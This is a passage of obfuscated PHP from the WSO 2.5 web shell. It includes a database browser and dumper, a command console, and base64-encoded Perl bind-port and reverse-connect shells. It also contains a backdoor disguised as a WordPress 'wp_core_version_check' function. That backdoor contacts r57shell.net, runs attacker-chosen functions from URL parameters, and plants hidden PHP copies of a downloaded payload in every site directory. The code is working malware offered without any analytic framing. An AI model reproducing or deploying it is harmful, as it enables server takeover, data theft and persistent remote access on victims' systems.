<td ><input type = text name = sql_login value = "" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . "" ></td >
\xa<td ><input type = text name = sql_pass value = "" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" ></td ><td > "; goto dxViD; dxViD: $tmp = "<input type = text name = sql_base value = '' > "; goto L_VIT; Auorx: echo "</td > \xd\xa\x9 \x9 <td ><input type = submit value = '>>' onclick = 'fs(d.sf);' ></td > \xd\xa <td ><input type = checkbox name = sql_count value = 'on'" . (empty($_POST["sql_count"]) ? '' : " checked") . " > count the number of rows </td > \xd\xa \x9</tr > \xd\xa\x9 </table >
\x9<script > \xd
s_db = '" . @addslashes($_POST["sql_base"]) . "';\xd\xa function fs(f) {
\xd\xa if (f . sql_base . value != s_db) {
f . onsubmit = function () {
};
\xd
if (f . p1) f . p1 . value = '';\xd
if (f . p2) f . p2 . value = '';\xd\xa if (f . p3) f . p3 . value = '';\xd\xa }
\xa }\xd
\x9 \x9function st(t, l){
\xa\x9\x9 \x9d . sf . p1 . value = 'select';\xd
\x9\x9 d . sf . p2 . value = t;
\xa if (l && d . sf . p3) d . sf . p3 . value = l;\xd
d . sf . submit();
}
\x9\x9function is(){\xd\xa \x9\x9 for (i = 0; i < d . sf . elements['tbl[]'] . length; ++i) \xd\xa\x9\x9 \x9d . sf . elements['tbl[]'][i] . checked = !d . sf . elements['tbl[]'][i] . checked;\xd\xa\x9\x9 }\xd\xa \x9 </script > "; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "<tr > "; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "<th > " . $key . "</th > "; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "</tr ><tr > "; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "<tr class="l" . $line . "" > "; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td ><i > null</i ></td > "; } else { echo "<td > " . nl2br(htmlspecialchars($value)) . "</td > "; } } echo "</tr > "; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "</table > "; goto zCgso; vhOW_: echo "<table width = 100 % cellspacing = 1 cellpadding = 2 class=main style = "background-color:#292929" > "; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "<div ><b > Error:</b > " . htmlspecialchars($db->error()) . "</div > "; } } goto f63uD; f63uD: echo "<br ></form ><form onsubmit = 'd.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;' ><textarea name = 'query' style = 'width:100%;height:100px' > "; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href =# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "</textarea><br/><input type=submit value='Execute'>"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n["n"]})</small>") . "</nobr><br>"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto uEPKu; QW0Ku: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto ss2k2; epF3V: echo "</td></tr>"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "</table></form><br/>"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto HfqGV; wQooQ: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
<h1 > Sql browser </h1 ><div class=content >
<form name = 'sf' method = 'post' onsubmit = 'fs(this);' ><table cellpadding = '2' cellspacing = '0' ><tr >
<td > Type</td ><td > Host</td ><td > Login</td ><td > Password</td ><td > Database</td ><td ></td ></tr ><tr > \xd\xa<input type = hidden name = a value = Sql ><input type = hidden name = p1 value = 'query' ><input type = hidden name = p2 value = '' ><input type = hidden name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' ><input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' > \xd\xa<td ><select name = 'type' ><option value = 'mysql' "; goto XNXvh; L_VIT: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zzoGT; zzoGT: switch ($_POST["charset"]) { case "Windows - 1251": $db->setCharset("cp1251"); break; case "UTF - 8": $db->setCharset("utf8"); break; case "KOI8 - R": $db->setCharset("koi8r"); break; case "KOI8 - U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto CgrPi; hq4SA: echo " </select > "; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value = "" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . " > " . $value . "</option > "; } goto hq4SA; KKbSG: echo "<select name = sql_base ><option value = '' ></option > "; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto urMgZ; NmhxL: if ($this->link = @pg_connect("host ={
$host[0]} port ={
$host[1]} user ={
$user} password ={
$pass} dbname ={
$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode(":", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate != 't'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema . tables where table_schema != 'information_schema' and table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql,_set_charset")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto hIi1_; hIi1_: $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); goto Vq5gq; RFQO1: return array("file" => implode("
", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto ytmal; ytmal: $this->query("drop table wso2"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";\xa
"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . ";\xa"; goto GZCGH; e85gZ: $this->query("SELECT * FROM `" . $table . "`"); goto XOdpv; A8Rtf: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "\xa ,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "pgsql": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES(" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("SELECT * FROM " . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["type"]); goto b5FFe; xAAjI: echo ">MySql </option ><option value = 'pgsql' "; goto WqMW0; b5FFe: if (@$_POST["p2"] == "download") { goto q3uCo; dKSpy: switch ($_POST["charset"]) { case "Windows - 1251": $db->setCharset("cp1251"); break; case "UTF - 8": $db->setCharset("utf8"); break; case "KOI8 - R": $db->setCharset("koi8r"); break; case "KOI8 - U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto SW_1d; SW_1d: if (empty($_POST["file"])) { goto UlEph; NKAxm: foreach ($_POST["tbl"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("ob_gzhandler", 4096); goto wxi0r; wxi0r: header("Content - Disposition: attachment; filename = dump . sql"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("Content - Type: text / plain"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["file"], "w")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["p2"]); goto eJ6NS; HVjKn: foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("<script > alert("Error! Can't open file");window . history . back(-1) </script > "); } goto V4cuJ; q3uCo: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto G1BTq; G1BTq: $db->selectdb($_POST["sql_base"]); goto dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["type"] == "mysql") { echo "selected"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI + JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0 = "; goto PvgFx; y9LP4: if (isset($_POST["p1"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["p1"] == "bpp") { goto OF3WF; SvfsQ: unlink(" / tmp / bp . pl"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo " < pre class=ml1 >{
$out}
" . wsoEx("ps aux | grep bp . pl") . " </pre > "; goto SvfsQ; P3N6B: $out = wsoEx("perl / tmp / bp . pl " . $_POST["p2"] . " 1 >/dev / null 2 >&1 & "); goto l42lD; OF3WF: cf(" / tmp / bp . pl", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["p1"] == "bcp") { goto KdsjF; EYep1: unlink(" / tmp / bc . pl"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo " < pre class=ml1 >{
$out}
" . wsoEx("ps aux | grep bc . pl") . " </pre > "; goto EYep1; KdsjF: cf(" / tmp / bc . pl", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("perl / tmp / bc . pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1 >/dev / null 2 >&1 & "); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo " < h1>Network tools </h1 ><div class=content > \xd
<form name = 'nfp' onSubmit = "g(null,null,'bpp',this.port.value);return false;" > \xd\xa\x9<span > Bind port to / bin / sh [perl] </span ><br />
\xa Port: <input type = 'text' name = 'port' value = '31337' > <input type = submit value = '>>' > \xd
\x9</form > \xd\xa <form name = 'nfp' onSubmit = "g(null,null,'bcp',this.server.value,this.port.value);return false;" > \xd\xa\x9<span > Back - connect [perl]</span ><br />
Server: <input type = 'text' name = 'server' value = '" . $_SERVER["REMOTE_ADDR"] . "' > Port: <input type = 'text' name = 'port' value = '31337' > <input type = submit value = '>>' >
\x9</form ><br > "; goto y9LP4; JZOTa: echo "</div > "; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d . cf . output . scrollTop = d . cf . output . scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s + ([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_ = '" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF - 8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "</form></div><script>d.cf.cmd.focus();</script>"; goto SJHUc; f8SjV: echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; goto RZ79V; qs3Ch: echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; goto qrzII; IWzV6: if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])); } goto nacH0; c_48E: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>"; goto qs3Ch; qrzII: foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } goto f8SjV; KpSEA: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["path"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto sM0UF; vbq6x: if (@$_GET["slince_golden"]) { goto TmOVZ; UCuri: if (function_exists("curl_init")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto kmEj4; TmOVZ: echo "<!-- //Silence is golden. -->"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["is"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["l"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["uri"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["l"])); } goto fi0K3; FBXXk: if (@$_GET["m"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("curl_init")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["m"] . "gagal.php"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("curl_init")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("curl_init")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto a3V7j; rOcio: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["REQUEST_URI"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "win") { $home_cwd = str_replace("\", 